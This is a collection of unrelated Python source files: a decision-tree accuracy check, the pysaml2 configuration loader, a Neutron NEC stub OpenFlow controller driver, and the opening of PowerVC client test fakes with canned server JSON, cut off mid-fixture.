    # assumes each row has exactly 5 columns: 4 features + 1 label — TODO confirm
    res = classify(data[0:4], tree)
    total += 1
    # NOTE(review): res.keys()[0] relies on Python 2 (keys() is a list) and
    # on each leaf holding a single outcome — confirm for noisy data.
    if res.keys()[0] != data[4]:
        failure += 1
print "Total: %s, Passed: %s, Failed: %s with an accuracy of %s%s" %(total, (total - failure), failure, float( (total - failure) * 100 / total), '%')
print "Prediction for ['(direct)', 'USA', 'yes', 5] is %s"% (classify(['(direct)', 'USA', 'yes', 5], tree))
|
|
#!/usr/bin/env python
__author__ = 'rolandh'
import sys
import os
import re
import logging
import logging.handlers
from importlib import import_module
from saml2 import root_logger, BINDING_URI, SAMLError
from saml2 import BINDING_SOAP
from saml2 import BINDING_HTTP_REDIRECT
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_ARTIFACT
from saml2.attribute_converter import ac_factory
from saml2.assertion import Policy
from saml2.mdstore import MetadataStore
from saml2.virtual_org import VirtualOrg
logger = logging.getLogger(__name__)
from saml2 import md
from saml2 import saml
from saml2.extension import mdui
from saml2.extension import idpdisc
from saml2.extension import dri
from saml2.extension import mdattr
from saml2.extension import ui
import xmldsig
import xmlenc
# Map of XML namespace -> schema module handed to MetadataStore when
# parsing SAML metadata documents.
ONTS = {
    saml.NAMESPACE: saml,
    mdui.NAMESPACE: mdui,
    mdattr.NAMESPACE: mdattr,
    dri.NAMESPACE: dri,
    ui.NAMESPACE: ui,
    idpdisc.NAMESPACE: idpdisc,
    md.NAMESPACE: md,
    xmldsig.NAMESPACE: xmldsig,
    xmlenc.NAMESPACE: xmlenc
}
# Configuration keys accepted by every entity type.
COMMON_ARGS = [
    "entityid", "xmlsec_binary", "debug", "key_file", "cert_file",
    "secret", "accepted_time_diff", "name", "ca_certs",
    "description", "valid_for", "verify_ssl_cert",
    "organization",
    "contact_person",
    "name_form",
    "virtual_organization",
    "logger",
    "only_use_keys_in_metadata",
    "logout_requests_signed",
    "disable_ssl_certificate_validation",
    "referred_binding",
    "session_storage",
    "entity_category",
    "xmlsec_path",
    "extension_schemas"
]
# Keys specific to a Service Provider ("sp") configuration.
SP_ARGS = [
    "required_attributes",
    "optional_attributes",
    "idp",
    "aa",
    "subject_data",
    "want_assertions_signed",
    "authn_requests_signed",
    "name_form",
    "endpoints",
    "ui_info",
    "discovery_response",
    "allow_unsolicited",
    "ecp",
    "name_id_format",
    "allow_unknown_attributes"
]
# Keys shared by Attribute Authority ("aa") and Identity Provider ("idp").
AA_IDP_ARGS = [
    "want_authn_requests_signed",
    "provided_attributes",
    "subject_data",
    "sp",
    "scope",
    "endpoints",
    "metadata",
    "ui_info",
    "name_id_format",
    "domain",
    "name_qualifier",
    "edu_person_targeted_id",
]
# Keys for Policy Decision Point ("pdp") and Attribute Query ("aq") entities.
PDP_ARGS = ["endpoints", "name_form", "name_id_format"]
AQ_ARGS = ["endpoints"]
# Keys whose values need construction (not plain copy) in load_complex.
COMPLEX_ARGS = ["attribute_converters", "metadata", "policy"]
ALL = set(COMMON_ARGS + SP_ARGS + AA_IDP_ARGS + PDP_ARGS + COMPLEX_ARGS)
# Which keys apply to which entity type; "" is the common/base context.
SPEC = {
    "": COMMON_ARGS + COMPLEX_ARGS,
    "sp": COMMON_ARGS + COMPLEX_ARGS + SP_ARGS,
    "idp": COMMON_ARGS + COMPLEX_ARGS + AA_IDP_ARGS,
    "aa": COMMON_ARGS + COMPLEX_ARGS + AA_IDP_ARGS,
    "pdp": COMMON_ARGS + COMPLEX_ARGS + PDP_ARGS,
    "aq": COMMON_ARGS + COMPLEX_ARGS + AQ_ARGS,
}
# --------------- Logging stuff ---------------
# Config-file level names mapped onto the stdlib logging constants.
LOG_LEVEL = {
    'debug': logging.DEBUG,
    'info': logging.INFO,
    'warning': logging.WARNING,
    'error': logging.ERROR,
    'critical': logging.CRITICAL}
# Config-file handler names mapped onto stdlib logging handler classes;
# handler kwargs come straight from the configuration (see log_handler()).
LOG_HANDLER = {
    "rotating": logging.handlers.RotatingFileHandler,
    "syslog": logging.handlers.SysLogHandler,
    "timerotate": logging.handlers.TimedRotatingFileHandler,
    "memory": logging.handlers.MemoryHandler,
}
LOG_FORMAT = "%(asctime)s %(name)s:%(levelname)s %(message)s"
# Default binding preference orders (most preferred first).
_RPA = [BINDING_HTTP_REDIRECT, BINDING_HTTP_POST, BINDING_HTTP_ARTIFACT]
_PRA = [BINDING_HTTP_POST, BINDING_HTTP_REDIRECT, BINDING_HTTP_ARTIFACT]
_SRPA = [BINDING_SOAP, BINDING_HTTP_REDIRECT, BINDING_HTTP_POST,
         BINDING_HTTP_ARTIFACT]
PREFERRED_BINDING = {
    "single_logout_service": _SRPA,
    "manage_name_id_service": _SRPA,
    "assertion_consumer_service": _PRA,
    "single_sign_on_service": _RPA,
    "name_id_mapping_service": [BINDING_SOAP],
    "authn_query_service": [BINDING_SOAP],
    "attribute_service": [BINDING_SOAP],
    "authz_service": [BINDING_SOAP],
    "assertion_id_request_service": [BINDING_URI],
    "artifact_resolution_service": [BINDING_SOAP],
    "attribute_consuming_service": _RPA
}
class ConfigurationError(SAMLError):
    """Raised when the SAML2 configuration is missing, invalid or inconsistent."""
    pass
# -----------------------------------------------------------------
class Config(object):
    """Base pysaml2 configuration container (Python 2 era code).

    Common settings live as plain attributes; per-entity-type ("sp", "idp",
    "aa", "pdp", "aq") settings are stored as attributes named
    "_<context>_<attr>" through the setattr/getattr helpers below.
    """
    # Default context selected when no entity-type context is active.
    def_context = ""
    def __init__(self, homedir="."):
        self._homedir = homedir
        self.entityid = None
        self.xmlsec_binary = None
        self.xmlsec_path = []
        self.debug = False
        self.key_file = None
        self.cert_file = None
        self.secret = None
        self.accepted_time_diff = None
        self.name = None
        self.ca_certs = None
        self.verify_ssl_cert = False
        self.description = None
        self.valid_for = None
        self.organization = None
        self.contact_person = None
        self.name_form = None
        self.name_id_format = None
        self.virtual_organization = None
        self.logger = None
        self.only_use_keys_in_metadata = True
        self.logout_requests_signed = None
        self.disable_ssl_certificate_validation = None
        self.context = ""
        self.attribute_converters = None
        self.metadata = None
        self.policy = None
        self.serves = []
        self.vorg = {}
        self.preferred_binding = PREFERRED_BINDING
        self.domain = ""
        self.name_qualifier = ""
        self.entity_category = ""
        self.crypto_backend = 'xmlsec1'
        self.scope = ""
        self.allow_unknown_attributes = False
        self.extension_schema = {}
    def setattr(self, context, attr, val):
        """Set `attr` to `val` in `context` ("" means the common context)."""
        if context == "":
            setattr(self, attr, val)
        else:
            setattr(self, "_%s_%s" % (context, attr), val)
    def getattr(self, attr, context=None):
        """Get `attr` from `context` (default: the active context); None if unset."""
        if context is None:
            context = self.context
        if context == "":
            return getattr(self, attr, None)
        else:
            return getattr(self, "_%s_%s" % (context, attr), None)
    def load_special(self, cnf, typ, metadata_construction=False):
        """Load the entity-type-specific part of the config dict `cnf`.

        Copies every key listed in SPEC[typ] into the `typ` context, then
        builds the complex values (policy/converters/metadata) for it.
        """
        for arg in SPEC[typ]:
            try:
                self.setattr(typ, arg, cnf[arg])
            except KeyError:
                pass
        self.context = typ
        self.load_complex(cnf, typ, metadata_construction=metadata_construction)
        self.context = self.def_context
    def load_complex(self, cnf, typ="", metadata_construction=False):
        """Construct policy, attribute converters and metadata for `typ`.

        Missing keys are simply skipped (KeyError is swallowed); metadata
        loading is skipped entirely during metadata construction.
        """
        try:
            self.setattr(typ, "policy", Policy(cnf["policy"]))
        except KeyError:
            pass
        # for srv, spec in cnf["service"].items():
        # try:
        # self.setattr(srv, "policy",
        # Policy(cnf["service"][srv]["policy"]))
        # except KeyError:
        # pass
        try:
            try:
                acs = ac_factory(cnf["attribute_map_dir"])
            except KeyError:
                acs = ac_factory()
            if not acs:
                raise ConfigurationError("No attribute converters, something is wrong!!")
            _acs = self.getattr("attribute_converters", typ)
            if _acs:
                _acs.extend(acs)
            else:
                self.setattr(typ, "attribute_converters", acs)
        except KeyError:
            pass
        if not metadata_construction:
            try:
                self.setattr(typ, "metadata",
                             self.load_metadata(cnf["metadata"]))
            except KeyError:
                pass
    def unicode_convert(self, item):
        """Recursively convert byte strings in `item` to unicode (UTF-8).

        NOTE(review): Python 2 only — relies on the `unicode` builtin and on
        the TypeError it raises for non-string input to trigger recursion.
        """
        try:
            return unicode(item, "utf-8")
        except TypeError:
            _uc = self.unicode_convert
            if isinstance(item, dict):
                return dict([(key, _uc(val)) for key, val in item.items()])
            elif isinstance(item, list):
                return [_uc(v) for v in item]
            elif isinstance(item, tuple):
                return tuple([_uc(v) for v in item])
            else:
                return item
    def load(self, cnf, metadata_construction=False):
        """ The base load method, loads the configuration
        :param cnf: The configuration as a dictionary
        :param metadata_construction: Is this only to be able to construct
            metadata. If so some things can be left out.
        :return: The Configuration instance
        """
        _uc = self.unicode_convert
        for arg in COMMON_ARGS:
            if arg == "virtual_organization":
                if "virtual_organization" in cnf:
                    for key, val in cnf["virtual_organization"].items():
                        self.vorg[key] = VirtualOrg(None, key, val)
                # vorgs are constructed above; skip the generic copy below.
                continue
            elif arg == "extension_schemas":
                # List of filename of modules representing the schemas
                if "extension_schemas" in cnf:
                    for mod_file in cnf["extension_schemas"]:
                        _mod = self._load(mod_file)
                        self.extension_schema[_mod.NAMESPACE] = _mod
            try:
                setattr(self, arg, _uc(cnf[arg]))
            except KeyError:
                pass
            except TypeError:  # Something that can't be a string
                setattr(self, arg, cnf[arg])
        if "service" in cnf:
            for typ in ["aa", "idp", "sp", "pdp", "aq"]:
                try:
                    self.load_special(
                        cnf["service"][typ], typ,
                        metadata_construction=metadata_construction)
                    self.serves.append(typ)
                except KeyError:
                    pass
        self.load_complex(cnf, metadata_construction=metadata_construction)
        self.context = self.def_context
        return self
    def _load(self, fil):
        """Import and return the Python module named by path `fil`.

        Side effect: prepends the file's directory (or ".") to sys.path.
        """
        head, tail = os.path.split(fil)
        if head == "":
            if sys.path[0] != ".":
                sys.path.insert(0, ".")
        else:
            sys.path.insert(0, head)
        return import_module(tail)
    def load_file(self, config_file, metadata_construction=False):
        """Import `config_file` as a module and load its CONFIG dict."""
        if config_file.endswith(".py"):
            config_file = config_file[:-3]
        mod = self._load(config_file)
        #return self.load(eval(open(config_file).read()))
        return self.load(mod.CONFIG, metadata_construction)
    def load_metadata(self, metadata_conf):
        """ Loads metadata into an internal structure """
        acs = self.attribute_converters
        if acs is None:
            raise ConfigurationError(
                "Missing attribute converter specification")
        # NOTE(review): the two bare excepts below can seemingly never fire —
        # both attributes are always set in __init__; confirm before tightening.
        try:
            ca_certs = self.ca_certs
        except:
            ca_certs = None
        try:
            disable_validation = self.disable_ssl_certificate_validation
        except:
            disable_validation = False
        mds = MetadataStore(
            ONTS.values(), acs, self, ca_certs,
            disable_ssl_certificate_validation=disable_validation)
        mds.imp(metadata_conf)
        return mds
    def endpoint(self, service, binding=None, context=None):
        """ Goes through the list of endpoint specifications for the
        given type of service and returns the first endpoint that matches
        the given binding. If no binding is given any endpoint for that
        service will be returned.
        :param service: The service the endpoint should support
        :param binding: The expected binding
        :return: All the endpoints that matches the given restrictions
        """
        spec = []
        unspec = []
        endps = self.getattr("endpoints", context)
        if endps and service in endps:
            for endpspec in endps[service]:
                try:
                    endp, bind = endpspec
                    if binding is None or bind == binding:
                        spec.append(endp)
                except ValueError:
                    # Entry without a binding (not a 2-tuple): collect as
                    # unspecified and use only if nothing matched exactly.
                    unspec.append(endpspec)
        if spec:
            return spec
        else:
            return unspec
    def log_handler(self):
        """Build and return a logging handler from self.logger, or a default.

        The first key in LOG_HANDLER found in the config wins; its value is
        passed as keyword arguments to the handler class.
        """
        try:
            _logconf = self.logger
        except KeyError:
            return None
        handler = None
        for htyp in LOG_HANDLER:
            if htyp in _logconf:
                if htyp == "syslog":
                    args = _logconf[htyp]
                    if "socktype" in args:
                        import socket
                        if args["socktype"] == "dgram":
                            args["socktype"] = socket.SOCK_DGRAM
                        elif args["socktype"] == "stream":
                            args["socktype"] = socket.SOCK_STREAM
                        else:
                            raise ConfigurationError("Unknown socktype!")
                    try:
                        handler = LOG_HANDLER[htyp](**args)
                    except TypeError:  # difference between 2.6 and 2.7
                        del args["socktype"]
                        handler = LOG_HANDLER[htyp](**args)
                else:
                    handler = LOG_HANDLER[htyp](**_logconf[htyp])
                break
        if handler is None:
            # default if rotating logger
            handler = LOG_HANDLER["rotating"]()
        if "format" in _logconf:
            formatter = logging.Formatter(_logconf["format"])
        else:
            formatter = logging.Formatter(LOG_FORMAT)
        handler.setFormatter(formatter)
        return handler
    def setup_logger(self):
        """Configure and return the package root logger from self.logger.

        Does nothing if the root logger already has a level set (someone
        else configured logging first).
        """
        if root_logger.level != logging.NOTSET:  # Someone got there before me
            return root_logger
        _logconf = self.logger
        if _logconf is None:
            return root_logger
        try:
            root_logger.setLevel(LOG_LEVEL[_logconf["loglevel"].lower()])
        except KeyError:  # reasonable default
            root_logger.setLevel(logging.INFO)
        root_logger.addHandler(self.log_handler())
        root_logger.info("Logging started")
        return root_logger
class SPConfig(Config):
    """Service Provider configuration; the default context is "sp"."""

    def_context = "sp"

    def __init__(self):
        Config.__init__(self)

    def vo_conf(self, vo_name):
        """Return the virtual-organization config for vo_name, or None."""
        try:
            return self.virtual_organization[vo_name]
        except KeyError:
            return None

    def ecp_endpoint(self, ipaddress):
        """Return the entity ID of the IdP the ECP client should talk to.

        :param ipaddress: The IP address of the user client
        :return: IdP entity ID, or None when no configured pattern matches
        """
        ecp_map = self.getattr("ecp")
        if not ecp_map:
            return None
        for pattern, entity_id in ecp_map.items():
            if re.match(pattern, ipaddress):
                return entity_id
        return None
class IdPConfig(Config):
    """Identity Provider (also used for AA/PDP/AQ) configuration; default context "idp"."""
    def_context = "idp"
    def __init__(self):
        Config.__init__(self)
def config_factory(typ, filename):
    """Load `filename` with the Config subclass appropriate for `typ`.

    "sp" -> SPConfig; "aa"/"idp"/"pdp"/"aq" -> IdPConfig; anything else
    falls back to the base Config.  The instance's context is set to `typ`.
    """
    if typ == "sp":
        conf = SPConfig().load_file(filename)
    elif typ in ("aa", "idp", "pdp", "aq"):
        conf = IdPConfig().load_file(filename)
    else:
        conf = Config().load_file(filename)
    # Every branch tags the loaded configuration with the requested context.
    conf.context = typ
    return conf
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Ryota MIBU
import netaddr
from neutron.common import log as call_log
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
from neutron.plugins.nec.common import exceptions as nexc
from neutron.plugins.nec import ofc_driver_base
LOG = logging.getLogger(__name__)
# Stub capacity limit: create_router raises a 409 OFCException once this
# many routers exist, simulating the real OFC running out of resources.
MAX_NUM_OPENFLOW_ROUTER = 2
class StubOFCDriver(ofc_driver_base.OFCDriverBase):
    """Stub OFC driver for testing.
    This driver can be used not only for unit tests but also for real testing
    as a logging driver. It stores the created resources on OFC and returns
    them in get methods().
    If autocheck is enabled, it checks whether the specified resource exists
    in OFC and raises an exception if it is different from expected status.
    """
    def __init__(self, conf):
        # `conf` is accepted for driver-interface compatibility but unused.
        self.autocheck = False
        self.reset_all()
    def reset_all(self):
        """Clear every in-memory fake OFC resource table."""
        self.ofc_tenant_dict = {}
        self.ofc_network_dict = {}
        self.ofc_port_dict = {}
        self.ofc_filter_dict = {}
        self.ofc_router_dict = {}
        self.ofc_router_inf_dict = {}
        self.ofc_router_route_dict = {}
    def enable_autocheck(self):
        self.autocheck = True
    def disable_autocheck(self):
        self.autocheck = False
    @call_log.log
    def create_tenant(self, description, tenant_id=None):
        # NOTE(review): the tenant_id=None default would crash on the slice
        # below; callers apparently always pass an id — confirm.
        ofc_id = "ofc-" + tenant_id[:-4]
        if self.autocheck:
            if ofc_id in self.ofc_tenant_dict:
                raise Exception(_('(create_tenant) OFC tenant %s '
                                  'already exists') % ofc_id)
        self.ofc_tenant_dict[ofc_id] = {'tenant_id': tenant_id,
                                        'description': description}
        return ofc_id
    @call_log.log
    def delete_tenant(self, ofc_tenant_id):
        if ofc_tenant_id in self.ofc_tenant_dict:
            del self.ofc_tenant_dict[ofc_tenant_id]
        else:
            # Deleting an unknown tenant is only an error under autocheck.
            if self.autocheck:
                raise Exception(_('(delete_tenant) OFC tenant %s not found')
                                % ofc_tenant_id)
        LOG.debug(_('delete_tenant: SUCCEED'))
    @call_log.log
    def create_network(self, ofc_tenant_id, description, network_id=None):
        ofc_id = "ofc-" + network_id[:-4]
        if self.autocheck:
            if ofc_tenant_id not in self.ofc_tenant_dict:
                raise Exception(_('(create_network) OFC tenant %s not found')
                                % ofc_tenant_id)
            if ofc_id in self.ofc_network_dict:
                raise Exception(_('(create_network) OFC network %s '
                                  'already exists') % ofc_id)
        self.ofc_network_dict[ofc_id] = {'tenant_id': ofc_tenant_id,
                                         'network_id': network_id,
                                         'description': description}
        return ofc_id
    @call_log.log
    def update_network(self, ofc_network_id, description):
        if self.autocheck:
            if ofc_network_id not in self.ofc_network_dict:
                raise Exception(_('(update_network) OFC network %s not found')
                                % ofc_network_id)
        data = {'description': description}
        self.ofc_network_dict[ofc_network_id].update(data)
        LOG.debug(_('update_network: SUCCEED'))
    @call_log.log
    def delete_network(self, ofc_network_id):
        if ofc_network_id in self.ofc_network_dict:
            del self.ofc_network_dict[ofc_network_id]
        else:
            if self.autocheck:
                raise Exception(_('(delete_network) OFC network %s not found')
                                % ofc_network_id)
        LOG.debug(_('delete_network: SUCCEED'))
    @call_log.log
    def create_port(self, ofc_network_id, info, port_id=None, filters=None):
        ofc_id = "ofc-" + port_id[:-4]
        if self.autocheck:
            if ofc_network_id not in self.ofc_network_dict:
                raise Exception(_('(create_port) OFC network %s not found')
                                % ofc_network_id)
            if ofc_id in self.ofc_port_dict:
                raise Exception(_('(create_port) OFC port %s already exists')
                                % ofc_id)
        self.ofc_port_dict[ofc_id] = {'network_id': ofc_network_id,
                                      'port_id': port_id}
        if filters:
            self.ofc_port_dict[ofc_id]['filters'] = filters
        return ofc_id
    @call_log.log
    def delete_port(self, ofc_port_id):
        if ofc_port_id in self.ofc_port_dict:
            del self.ofc_port_dict[ofc_port_id]
        else:
            if self.autocheck:
                raise Exception(_('(delete_port) OFC port %s not found')
                                % ofc_port_id)
        LOG.debug(_('delete_port: SUCCEED'))
    @classmethod
    def filter_supported(cls):
        # The stub pretends packet filters are supported.
        return True
    def create_filter(self, ofc_network_id, filter_dict,
                      portinfo=None, filter_id=None, apply_ports=None):
        # Filters are not tracked; only a deterministic id is returned.
        return "ofc-" + filter_id[:-4]
    def delete_filter(self, ofc_filter_id):
        pass
    def convert_ofc_tenant_id(self, context, ofc_tenant_id):
        # Id conversion is a no-op in the stub.
        return ofc_tenant_id
    def convert_ofc_network_id(self, context, ofc_network_id, tenant_id):
        return ofc_network_id
    def convert_ofc_port_id(self, context, ofc_port_id, tenant_id, network_id):
        return ofc_port_id
    def convert_ofc_filter_id(self, context, ofc_filter_id):
        return ofc_filter_id
    # Capability flags advertised to the plugin.
    router_supported = True
    router_nat_supported = True
    @call_log.log
    def create_router(self, ofc_tenant_id, router_id, description):
        ofc_id = "ofc-" + router_id[:-4]
        if self.autocheck:
            if ofc_tenant_id not in self.ofc_tenant_dict:
                raise Exception(_('(create_router) OFC tenant %s not found')
                                % ofc_tenant_id)
            if ofc_id in self.ofc_router_dict:
                raise Exception(_('(create_router) OFC router %s '
                                  'already exists') % ofc_id)
        # Simulate the OFC running out of router capacity with a 409.
        if len(self.ofc_router_dict) >= MAX_NUM_OPENFLOW_ROUTER:
            params = {'reason': _("Operation on OFC is failed"),
                      'status': 409}
            raise nexc.OFCException(**params)
        self.ofc_router_dict[ofc_id] = {'tenant_id': ofc_tenant_id,
                                        'router_id': router_id,
                                        'description': description}
        return ofc_id
    @call_log.log
    def delete_router(self, ofc_router_id):
        if ofc_router_id in self.ofc_router_dict:
            del self.ofc_router_dict[ofc_router_id]
        else:
            if self.autocheck:
                raise Exception(_('(delete_router) OFC router %s not found')
                                % ofc_router_id)
        LOG.debug(_('delete_router: SUCCEED'))
    @call_log.log
    def add_router_interface(self, ofc_router_id, ofc_net_id,
                             ip_address=None, mac_address=None):
        if_id = "ofc-" + uuidutils.generate_uuid()[:-4]
        # IP address should have a format of a.b.c.d/N
        if ip_address != str(netaddr.IPNetwork(ip_address)):
            raise Exception(_('(add_router_interface) '
                              'ip_address %s is not a valid format (a.b.c.d/N).')
                            % ip_address)
        if self.autocheck:
            if ofc_router_id not in self.ofc_router_dict:
                raise Exception(_('(add_router_interface) '
                                  'OFC router %s not found') % ofc_router_id)
            if ofc_net_id not in self.ofc_network_dict:
                raise Exception(_('(add_router_interface) '
                                  'OFC network %s not found') % ofc_net_id)
            # Check duplicate destination
        self.ofc_router_inf_dict[if_id] = {'router_id': ofc_router_id,
                                           'network_id': ofc_net_id,
                                           'ip_address': ip_address,
                                           'mac_address': mac_address}
        LOG.debug(_('add_router_interface: SUCCEED (if_id=%s)'), if_id)
        return if_id
    @call_log.log
    def update_router_interface(self, ofc_router_inf_id,
                                ip_address=None, mac_address=None):
        if ofc_router_inf_id not in self.ofc_router_inf_dict:
            if self.autocheck:
                raise Exception(_('(delete_router_interface) '
                                  'OFC router interface %s not found')
                                % ofc_router_inf_id)
            # Without autocheck, silently materialize the missing interface.
            self.ofc_router_inf_dict[ofc_router_inf_id] = {}
        inf = self.ofc_router_inf_dict[ofc_router_inf_id]
        if ip_address:
            inf.update({'ip_address': ip_address})
        if mac_address:
            inf.update({'mac_address': mac_address})
        LOG.debug(_('update_router_route: SUCCEED'))
    @call_log.log
    def delete_router_interface(self, ofc_router_inf_id):
        if ofc_router_inf_id in self.ofc_router_inf_dict:
            del self.ofc_router_inf_dict[ofc_router_inf_id]
        else:
            if self.autocheck:
                raise Exception(_('(delete_router_interface) '
                                  'OFC router interface %s not found')
                                % ofc_router_inf_id)
        LOG.debug(_('delete_router_interface: SUCCEED'))
    @call_log.log
    def add_router_route(self, ofc_router_id, destination, nexthop):
        route_id = "ofc-" + uuidutils.generate_uuid()[:-4]
        # IP address format check
        netaddr.IPNetwork(destination)
        netaddr.IPAddress(nexthop)
        if self.autocheck:
            if ofc_router_id not in self.ofc_router_dict:
                raise Exception(_('(add_router_route) OFC router %s not found')
                                % ofc_router_id)
            # Check duplicate destination
            if destination in [route['destination'] for route in
                               self.ofc_router_route_dict.values()]:
                raise Exception(_('(add_router_route) '
                                  'route to "%s" already exists') % destination)
        self.ofc_router_route_dict[route_id] = {'router_id': ofc_router_id,
                                                'destination': destination,
                                                'nexthop': nexthop}
        LOG.debug(_('add_router_route: SUCCEED (route_id=%s)'), route_id)
        return route_id
    @call_log.log
    def delete_router_route(self, ofc_router_route_id):
        if ofc_router_route_id in self.ofc_router_route_dict:
            del self.ofc_router_route_dict[ofc_router_route_id]
        else:
            if self.autocheck:
                raise Exception(_('(delete_router_route) OFC router route %s '
                                  'not found') % ofc_router_route_id)
        LOG.debug(_('delete_router_route: SUCCEED'))
    @call_log.log
    def list_router_routes(self, ofc_router_id):
        if self.autocheck:
            if ofc_router_id not in self.ofc_router_dict:
                raise Exception(_('(delete_router) OFC router %s not found')
                                % ofc_router_id)
        routes = [{'id': k,
                   'destination': v['destination'],
                   'nexthop': v['nexthop']}
                  for k, v in self.ofc_router_route_dict.items()
                  if v['router_id'] == ofc_router_id]
        LOG.debug(_('list_router_routes: routes=%s'), routes)
        return routes
|
|
# Copyright 2013 IBM Corp.
import sys
import eventlet
import mock
import testtools
from novaclient.tests.v1_1 import fakes as novafakes
from cinderclient.tests.v1 import fakes as cinderfakes
from novaclient.tests import utils
from powervc.common import utils as pvc_utils
from powervc.common.client.extensions import nova as ext_nova
from powervc.common.client.extensions import cinder as ext_cinder
from powervc.common.client import delegate
from powervc.common import config
from powervc.common.utils import SCGCache
from powervc.common.utils import VolumeCache
sys.modules['powervc.common.config'] = mock.MagicMock()
"""
This class similarly extend the current nova client test cases
and cinder client testcases to provide powervc specified
storage-connectivity-group, storage template and volume related testcases
To run the testcases, alternatively:
1. Right click the TestNovaClient.py --> Run As --> Python unit-test
or
2. Refer to this link for detail UT running information:
https://jazz04.rchland.ibm.com:9443/jazz/service/ +
com.ibm.team.workitem.common.internal.rest.IAttachmentRestService/ +
itemName/com.ibm.team.workitem.Attachment/67843
The UtilsRealTest connect to real PowerVC v1.2 and retrieve information.
This cases might be fail due to real environment unavailable, all other
fake testcases should be run successfully.
"""
class PVCFakeNovaClient(novafakes.FakeClient):
    """
    Extends the stock nova FakeClient so that self.client is a
    PVCFakeNovaHTTPClient, which serves the PowerVC-specific fake responses.
    """
    def __init__(self, *args, **kwargs):
        novafakes.FakeClient.__init__(self, *args, **kwargs)
        self.client = PVCFakeNovaHTTPClient(**kwargs)
class PVCFakeNovaHTTPClient(novafakes.FakeHTTPClient):
"""
This PVCFakeHTTPClient class extends the current nova FakeHTTPClient.
For all the HTTP requests in this class, it returns a fake json data
as specified beforehand instead of requesting to a real environment.
"""
    def __init__(self, **kwargs):
        # Delegate all setup to the stock fake HTTP client; this subclass
        # only adds the PowerVC-specific GET handlers defined below.
        novafakes.FakeHTTPClient.__init__(self, **kwargs)
    def get_servers_detail(self, **kw):
        """Return a canned (status, headers, body) servers-detail response.

        The body is a fixed fixture of two PowerVC-flavored server records;
        the embedded backslash line-continuations are part of the original
        fixture strings and must be preserved as-is.
        """
        return (200, {}, {
            "servers": [
                {
                    "OS-EXT-STS:task_state": "activating",
                    "addresses": {
                        "VLAN1": [
                            {
                                "version": 4,
                                "addr": "10.4.11.113",
                                "OS-EXT-IPS:type": "fixed"
                            }
                        ]
                    },
                    "image": {
                        "id": "fd2a0fdc-fcda-45fc-b5dd-96b9d9e0aa4d",
                        "links": [
                            {
                                "href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
images/fd2a0fdc-fcda-45fc-b5dd-96b9d9e0aa4d",
                                "rel": "bookmark"
                            }
                        ]
                    },
                    "ephemeral_gb": 1,
                    "cpus": "1",
                    "flavor": {
                        "id": "726544ff-9f0a-41ad-8b26-e6575bfe8146",
                        "links": [
                            {
                                "href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
flavors/726544ff-9f0a-41ad-8b26-e6575bfe8146",
                                "rel": "bookmark"
                            }
                        ]
                    },
                    "user_id": "8a326a8c5a774022a1ec49f5692bc316",
                    "vcpu_mode": "shared",
                    "desired_compatibility_mode": "default",
                    "updated": "2013-09-04T07:09:33Z",
                    "memory_mode": "dedicated",
                    "key_name": None,
                    "min_memory_mb": 512,
                    "name": "hc-22",
                    "min_vcpus": "0.10",
                    "vcpus": "0.50",
                    "max_memory_mb": 4096,
                    "min_cpus": "1",
                    "links": [
                        {
                            "href": "https://localhost/powervc/openstack/\
compute/\
v2/2ec48b8ec30f4328bf95b8a5ad147c4b/servers/\
6e205d64-7651-42bf-9c8b-b0cb4208e813",
                            "rel": "self"
                        },
                        {
                            "href": "https://localhost/powervc/openstack/\
compute/\
2ec48b8ec30f4328bf95b8a5ad147c4b/servers/\
6e205d64-7651-42bf-9c8b-b0cb4208e813",
                            "rel": "bookmark"
                        }
                    ],
                    "max_vcpus": "16.00",
                    "OS-EXT-STS:vm_state": "active",
                    "OS-EXT-SRV-ATTR:instance_name":
                    "nova-z3-9-5-125-55-00000075",
                    "OS-EXT-SRV-ATTR:host": "ngp01_03_vios_1",
                    "id": "6e205d64-7651-42bf-9c8b-b0cb4208e813",
                    "security_groups": [
                        {
                            "name": "default"
                        }
                    ],
                    "OS-DCF:diskConfig": "MANUAL",
                    "health_status": {
                        "health_value": "UNKNOWN",
                        "unknown_reason":
                        "Unable to get related hypervisor data"
                    },
                    "accessIPv4": "",
                    "accessIPv6": "",
                    "progress": 0,
                    "OS-EXT-STS:power_state": 1,
                    "OS-EXT-AZ:availability_zone": "nova",
                    "metadata": {},
                    "status": "ACTIVE",
                    "hostId":
                    "db8f3c353837a52c3782b4d04a767b33bd7dfa72983b4ab9aef91cb0",
                    "cpu_utilization": 0,
                    "compliance_status": [
                        {
                            "status": "compliant",
                            "category": "resource.allocation"
                        }
                    ],
                    "current_compatibility_mode": "POWER7",
                    "root_gb": 4,
                    "OS-EXT-SRV-ATTR:hypervisor_hostname":
                    "ngp01-03-vios-1.rtp.stglabs.ibm.com",
                    "created": "2013-09-04T07:08:31Z",
                    "tenant_id": "2ec48b8ec30f4328bf95b8a5ad147c4b",
                    "memory_mb": 512,
                    "max_cpus": "16"
                },
                {
                    "OS-EXT-STS:task_state": "activating",
                    "addresses": {
                        "VLAN1": [
                            {
                                "version": 4,
                                "addr": "10.4.11.112",
                                "OS-EXT-IPS:type": "fixed"
                            }
                        ]
                    },
                    "image": {
                        "id": "fd2a0fdc-fcda-45fc-b5dd-96b9d9e0aa4d",
                        "links": [
                            {
                                "href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
images/\
fd2a0fdc-fcda-45fc-b5dd-96b9d9e0aa4d",
                                "rel": "bookmark"
                            }
                        ]
                    },
                    "ephemeral_gb": 1,
                    "cpus": "1",
                    "flavor": {
                        "id": "726544ff-9f0a-41ad-8b26-e6575bfe8146",
                        "links": [
                            {
                                "href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
